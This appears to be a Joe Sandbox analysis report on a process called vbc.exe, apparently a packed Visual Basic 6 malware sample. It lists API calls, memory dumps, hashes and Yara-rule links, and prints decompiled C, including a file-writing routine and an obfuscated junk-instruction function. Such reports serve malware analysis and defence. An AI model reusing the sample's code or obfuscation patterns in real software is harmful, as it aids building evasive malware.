__vbaNew2.MSVBVM60(0FA3696C,0FA88818), ref: 0FA4D634
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA3695C,00000014), ref: 0FA4D65F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3697C,00000058), ref: 0FA4D687
__vbaObjSet.MSVBVM60(?,00000000), ref: 0FA4D697
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA369D0,000000E0), ref: 0FA4D6BE
__vbaStrI2.MSVBVM60(?), ref: 0FA4D6C4
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D6CF
#690.MSVBVM60(?,Options,Show Tips at Startup,00000000), ref: 0FA4D6E4
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0FA4D6F4
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0FA4D704

Strings

Show Tips at Startup, xrefs: 0FA4D6D9
Options, xrefs: 0FA4D6DE

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$CheckHresult$FreeList$#690MoveNew2
String ID: Options$Show Tips at Startup
API String ID: 2513475975-2759323971
Opcode ID: 0f7bb058644e72b962bd2634c94a61999b837909a1a1d3bf25b0aba8530576eb
Instruction ID: 99daebf823f9c3f55e00a20143ba32ca79cd5c816492951f8bfedff226868c7e
Opcode Fuzzy Hash: 0f7bb058644e72b962bd2634c94a61999b837909a1a1d3bf25b0aba8530576eb
Instruction Fuzzy Hash: 93412A74E00209BFDB00DFA4CC89EEEBBB8FF49715F504129F505A7252D678A9468BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4DCC0 Relevance: 15.1, APIs: 10, Instructions: 107COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0FA3693C,0FA3136C), ref: 0FA4DD16
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA3692C,00000024), ref: 0FA4DD37
__vbaObjSet.MSVBVM60(?,00000000), ref: 0FA4DD56
__vbaNew2.MSVBVM60(0FA3693C,0FA3136C), ref: 0FA4DD6A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA3692C,0000001C), ref: 0FA4DD9C
__vbaStrVarVal.MSVBVM60(?,?), ref: 0FA4DDAC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA36B7C,00000054), ref: 0FA4DDC6
__vbaFreeStr.MSVBVM60 ref: 0FA4DDCF
__vbaFreeObj.MSVBVM60 ref: 0FA4DDD8
__vbaFreeVar.MSVBVM60 ref: 0FA4DDE1

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$CheckFreeHresult$New2
String ID:
API String ID: 4034668929-0
Opcode ID: 6aeff1930547d57f6eb1e5057995752d85ff11f3cb9d26808cfc919a23472c64
Instruction ID: d8db06cad2df8c0ea8bb20f4ffc0f4199b9dd765e6b4febe1373813a0546a688
Opcode Fuzzy Hash: 6aeff1930547d57f6eb1e5057995752d85ff11f3cb9d26808cfc919a23472c64
Instruction Fuzzy Hash: D4412770E00209ABCB109FA9DD88EAEBBFCFF59715B108119F501A3252D778A906CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4A850 Relevance: 13.6, APIs: 9, Instructions: 122COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000005,00000000,72A1C6D9,72A1DE99,72A1C6FC), ref: 0FA4A8B0
__vbaVarMove.MSVBVM60 ref: 0FA4A8DA
__vbaVarZero.MSVBVM60 ref: 0FA4A90A
__vbaVarZero.MSVBVM60 ref: 0FA4A929
__vbaVarZero.MSVBVM60 ref: 0FA4A948
__vbaVarZero.MSVBVM60 ref: 0FA4A967
__vbaVarZero.MSVBVM60 ref: 0FA4A990
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4A9B8
__vbaVarMove.MSVBVM60 ref: 0FA4A9D7

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Zero$Move$EraseRedim
String ID:
API String ID: 3302267972-0
Opcode ID: 3bc1a079d7ee5aaf12844bb58b1336097d02d69adb535b94b72c4c3b2f010bd7
Instruction ID: a6ab578515ef495306a290b7057428fc43801f97a734e08ccf4cc8acd67c16c2
Opcode Fuzzy Hash: 3bc1a079d7ee5aaf12844bb58b1336097d02d69adb535b94b72c4c3b2f010bd7
Instruction Fuzzy Hash: 0C5106B0D002589FDB18CF98D898A9DBFB4FF48320F15425EE50AA7355DB74A985CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4A060 Relevance: 12.1, APIs: 8, Instructions: 102
fileCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0FA4A060(void* __ebx, void* __edi, void* __esi, WCHAR* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct _OVERLAPPED* _v28;
				struct _OVERLAPPED* _v32;
				char _v36;
				char _v40;
				void** _v48;
				struct _OVERLAPPED* _v56;
				long _v60;
				WCHAR* _t37;
				void* _t38;
				intOrPtr _t42;
				long _t49;
				intOrPtr _t70;
				void* _t74;
				void* _t76;
				intOrPtr _t77;

				_t77 = _t76 - 8;
				 *[fs:0x0] = _t77;
				_v12 = _t77 - 0x2c;
				_v8 = 0xfa311b0;
				_t37 = _a4;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v56 = 0;
				_v60 = 0;
				__imp__#644( *_t37, __edi, __esi, __ebx,  *[fs:0x0], 0xfa32ff6, _t74);
				_v60 = _t37;
				_t38 = CreateFileW(_t37, 0xc0000000, 3, 0, 2, 0x80, 0);
				_v28 = _t38;
				if(_t38 != 0xffffffff) {
					_t70 =  *_a8;
					_t49 = E0FA32F6C(_t70);
					if(_t49 > 0) {
						_v60 = 0;
						__imp____vbaAryLock( &_v36, _t70);
						WriteFile(_v28,  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 0x14)), _t49,  &_v60, 0);
						__imp____vbaAryUnlock( &_v36);
					}
					__imp____vbaRedim(0x880, 0x10,  &_v40, 0, 1, 0, 0);
					_v56 = 0x4003;
					_v48 =  &_v28;
					__imp____vbaVarZero();
					_t42 =  *0xfa881f8; // 0x0
					_t38 = L0FA32CA7( *((intOrPtr*)( *((intOrPtr*)(_t42 + 0xc)) + (0xc -  *((intOrPtr*)(_t42 + 0x14))) * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t42 + 0xc)) + (0xc -  *((intOrPtr*)(_t42 + 0x14))) * 4)),  &_v40);
					__imp____vbaErase(0,  &_v40);
					_v32 = 0xffffffff;
				}
				_push(0xfa4a1a3);
				return _t38;
			}

0x0fa4a063
0x0fa4a072
0x0fa4a07f
0x0fa4a082
0x0fa4a089
0x0fa4a08e
0x0fa4a091
0x0fa4a096
0x0fa4a09a
0x0fa4a09d
0x0fa4a0a0
0x0fa4a0a3
0x0fa4a0ba
0x0fa4a0bd
0x0fa4a0c6
0x0fa4a0c9
0x0fa4a0d2
0x0fa4a0da
0x0fa4a0de
0x0fa4a0e5
0x0fa4a0e8
0x0fa4a104
0x0fa4a10e
0x0fa4a10e
0x0fa4a124
0x0fa4a12d
0x0fa4a134
0x0fa4a14d
0x0fa4a153
0x0fa4a16d
0x0fa4a177
0x0fa4a17d
0x0fa4a17d
0x0fa4a184
0x00000000

APIs

#644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4A0A3
CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 0FA4A0BD
__vbaAryLock.MSVBVM60(?), ref: 0FA4A0E8
WriteFile.KERNEL32(?,0FA32FF6,00000000,?,00000000), ref: 0FA4A104
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A10E
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 0FA4A124
__vbaVarZero.MSVBVM60 ref: 0FA4A14D
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4A177

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$File$#644CreateEraseLockRedimUnlockWriteZero
String ID:
API String ID: 2317852514-0
Opcode ID: 0b116eed29e8fb17e68c541e38eb5706fe20832c80713642583e1851b9aa68ca
Instruction ID: 471f0f5a3fc8abe71fab93f64dde77d6b06e8c0e38e749f71f610c7b62c0fa94
Opcode Fuzzy Hash: 0b116eed29e8fb17e68c541e38eb5706fe20832c80713642583e1851b9aa68ca
Instruction Fuzzy Hash: A44138B4D00218AFCB10DFA8D989EDEBFB8FF49720F108109F505A7281C778A905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D2B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

#593.MSVBVM60(?), ref: 0FA4D2F2
__vbaNew2.MSVBVM60(0FA3693C,00000000), ref: 0FA4D30E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3692C,00000024), ref: 0FA4D32F
__vbaR8IntI4.MSVBVM60 ref: 0FA4D341
__vbaFreeVar.MSVBVM60 ref: 0FA4D34D
__vbaNew2.MSVBVM60(0FA33A6C,0FA882BC), ref: 0FA4D366
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA36850,000006FC), ref: 0FA4D38D

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$CheckHresultNew2$#593Free
String ID:
API String ID: 2147906589-0
Opcode ID: c4db88db28e1577e7216970ff8822ca4762c558f8b2756e8ab6f68892baf438d
Instruction ID: 7352a0274354b2b5882869ec4d5cdfaffdacf335410809111d90a897b6cce619
Opcode Fuzzy Hash: c4db88db28e1577e7216970ff8822ca4762c558f8b2756e8ab6f68892baf438d
Instruction Fuzzy Hash: DA214C74A01715FBCB109FA5EE49B9ABBB8FF49712F500018F445A3241D7B8A422CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D070 Relevance: 10.5, APIs: 7, Instructions: 39COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60(72A1A008,00000000,72A46AEE,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0A7
__vbaI4Var.MSVBVM60(?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0B1
#526.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0BC
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0C6
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0D3
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0DC
__vbaFreeVar.MSVBVM60(0FA4D0FD,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0F6

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$FreeMove$#526
String ID:
API String ID: 1133469359-0
Opcode ID: ce38383d2b4501d64015510bea6b8d09be39d8bfa1b7c3612cbcba9dd7aa434b
Instruction ID: 485770fc87d7096d9bc035fcb1c448531f4726878b023e99e67bcd0f909cb12b
Opcode Fuzzy Hash: ce38383d2b4501d64015510bea6b8d09be39d8bfa1b7c3612cbcba9dd7aa434b
Instruction Fuzzy Hash: 7601E575D10259EBCF00EFA4DE89EEEBBB8FB48716F004519F502A2204EB7865168B61

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D110 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

__vbaObjSetAddref.MSVBVM60(?,0FA85FA0,72A1A008,0FA32FF6,72A46AEE,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4D152
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6,0FA85FA0), ref: 0FA4D17D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA4D1F4
__vbaStrCopy.MSVBVM60 ref: 0FA4D203
__vbaFreeObj.MSVBVM60(0FA4D224,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6,0FA85FA0), ref: 0FA4D21D

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$CheckHresult$AddrefCopyFree
String ID:
API String ID: 2020984855-0
Opcode ID: 243a82a2c0601e69e9a2e561de15b1c39165e897361a03c273ecdb7c1fcc2efc
Instruction ID: 03ad7d77f3757c41ea89d07d2e32001152b78d1112ad16f77ec6899c4a778f28
Opcode Fuzzy Hash: 243a82a2c0601e69e9a2e561de15b1c39165e897361a03c273ecdb7c1fcc2efc
Instruction Fuzzy Hash: A2311EB1D00209AFDB04DFA8D945DAEBBB8FF48701F108609F515B7241D778A906CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D7D0 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0FA3696C,0FA88818,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D828
__vbaObjSetAddref.MSVBVM60(?,0FA31318,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D83E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA3695C,00000010,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D85B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D864

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$AddrefCheckFreeHresultNew2
String ID:
API String ID: 1649212984-0
Opcode ID: 5d6331c7c23717b7745b16dedfa88229f136130459a9360f45d7492628a5f0a9
Instruction ID: 17530efaf3fcd1fedeeac0de51de3488306ec64785cb42dd4e13098e0f3c675d
Opcode Fuzzy Hash: 5d6331c7c23717b7745b16dedfa88229f136130459a9360f45d7492628a5f0a9
Instruction Fuzzy Hash: 04114F74D00209BBCB109F69CD85AAEBBB8FB49725F508129F541A3342CA78A9468BD0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4BF90 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__vbaVarVargNofree.MSVBVM60(72A1A008,00000000,72A46AEE,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFC7
__vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD2
#644.MSVBVM60(00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD9
__vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFE5

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$#644FreeNofreeVarg
String ID:
API String ID: 1185345826-0
Opcode ID: 579766293954fcc10833933cd59d34e4d9bc7a5dd74b66474a422f388c44dad3
Instruction ID: d9f27efa35a3d603faed923cff61f9abfd6966884b9643991d2dbcbfa331c731
Opcode Fuzzy Hash: 579766293954fcc10833933cd59d34e4d9bc7a5dd74b66474a422f388c44dad3
Instruction Fuzzy Hash: E4F0F9B5D00209EBCB00EFE4C94AADFBFB8FB48751F00451AF505E2101EA3895558FB1

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4A4D0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__vbaVarVargNofree.MSVBVM60(?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4A507
__vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4A512
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4A519
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4A525

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$#644FreeNofreeVarg
String ID:
API String ID: 1185345826-0
Opcode ID: 4224e8cd407f39f699289999119d4a0611d9919d7acea6e9c733c6ffb9814953
Instruction ID: 3c5d1597d8787325c5cba8adcea44893780bf01cda770cfbd0f3f97ed4571ff3
Opcode Fuzzy Hash: 4224e8cd407f39f699289999119d4a0611d9919d7acea6e9c733c6ffb9814953
Instruction Fuzzy Hash: 77F0F9B5C40249EBCB00EFA4D949AEFBFB8FF59611F40451AB502E2101E67855558BA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 1664, Parent PID: 972COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	516
Total number of Limit Nodes:	2

Executed Functions

Function 0040158A Relevance: 10.8, APIs: 7, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040158A(void* __eax, void* __ebx, void* __ecx, signed char __edx, signed int* __esi) {
				signed char _t116;
				signed int _t120;
				signed int _t123;
				intOrPtr _t124;
				struct _GUID _t131;
				signed int _t132;
				struct _GUID _t133;
				PVOID* _t135;
				PVOID* _t137;
				signed char _t138;
				void* _t139;
				intOrPtr* _t141;
				PVOID* _t156;
				signed int _t157;
				PVOID* _t158;
				signed int _t159;
				void* _t162;
				intOrPtr _t163;
				void* _t168;
				signed int* _t170;
				signed int _t177;
				int _t178;
				signed char _t195;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				void* _t203;
				signed int _t204;
				void* _t207;
				void* _t214;
				long _t215;
				signed int _t217;
				void* _t218;
				signed int* _t226;
				HANDLE* _t227;
				HANDLE* _t229;
				void* _t234;
				signed int _t237;
				void* _t239;
				void* _t240;
				void* _t242;
				intOrPtr* _t245;
				void* _t248;
				signed int _t250;

				L0:
				while(1) {
					L0:
					_t226 = __esi;
					_t195 = __edx;
					_t162 = __ebx;
					_t116 = __ecx + 4;
					_t250 = _t116 & 0x00000087;
					if(_t250 <= 0) {
						break;
					}
					L30:
					gs = __esi;
					__al = __al + 0x8e;
					 *__ebx = (__edx << 0x00000020 |  *__ebx) >> __cl;
					asm("popfd");
					__eax = __eax + 0xbec00404;
					__ecx = __ecx +  *((intOrPtr*)(__esi - 0x10498f04));
					__eflags = __ecx;
					while(1) {
						L31:
						asm("cld");
						if(__eflags < 0) {
							break;
						}
						L32:
						asm("out dx, eax");
						if(__eflags < 0) {
							continue;
						} else {
							L33:
							asm("adc ah, bh");
							__eflags = __al - 0xbe;
							asm("psubq mm7, mm3");
							asm("sti");
							asm("sti");
							asm("movsd");
							asm("movsb");
							asm("lodsb");
							asm("lodsd");
							asm("adc edi, [esi+eax]");
							__al = __al + 4;
							__eflags = __al;
							asm("adc ch, dh");
							if(__al < 0) {
								L21:
								__eax = __eax + 0x76560404;
								__eflags = __eax;
								while(1) {
									L22:
									__al = __al + 0x56;
									__eflags = __al;
									if(__al <= 0) {
										break;
									}
									L23:
									__esi = __esi +  *((intOrPtr*)(__edx - 7));
									__eflags = __esi;
									L24:
									while(__eflags >= 0) {
										if(__eflags <= 0) {
											L7:
											asm("in al, dx");
											__al = __al | 0x00000053;
											_push(__esi);
											_push(__edi);
											goto L10;
										} else {
											L26:
											_pop(es);
											if(__eflags < 0) {
												continue;
											} else {
												L27:
												if(__eflags <= 0) {
													L10:
													asm("hlt");
													__eax = 0x1554;
													__ecx = 0x8d;
													__eax = L004012ED(__eax, __ebx, __ecx, __edi, __esi, __eflags);
													if(__eflags < 0) {
														L3:
														_t226[4] = _t226[4] & 0xf6108b0f;
														return _t116;
													} else {
														L15:
														asm("repe retf 0x723b");
														goto L16;
													}
												} else {
													L28:
													asm("bswap edx");
													__dl = __dl ^  *(__ecx - 0x34046c01);
													__eflags = __dl;
													L29:
													_t16 = __eax;
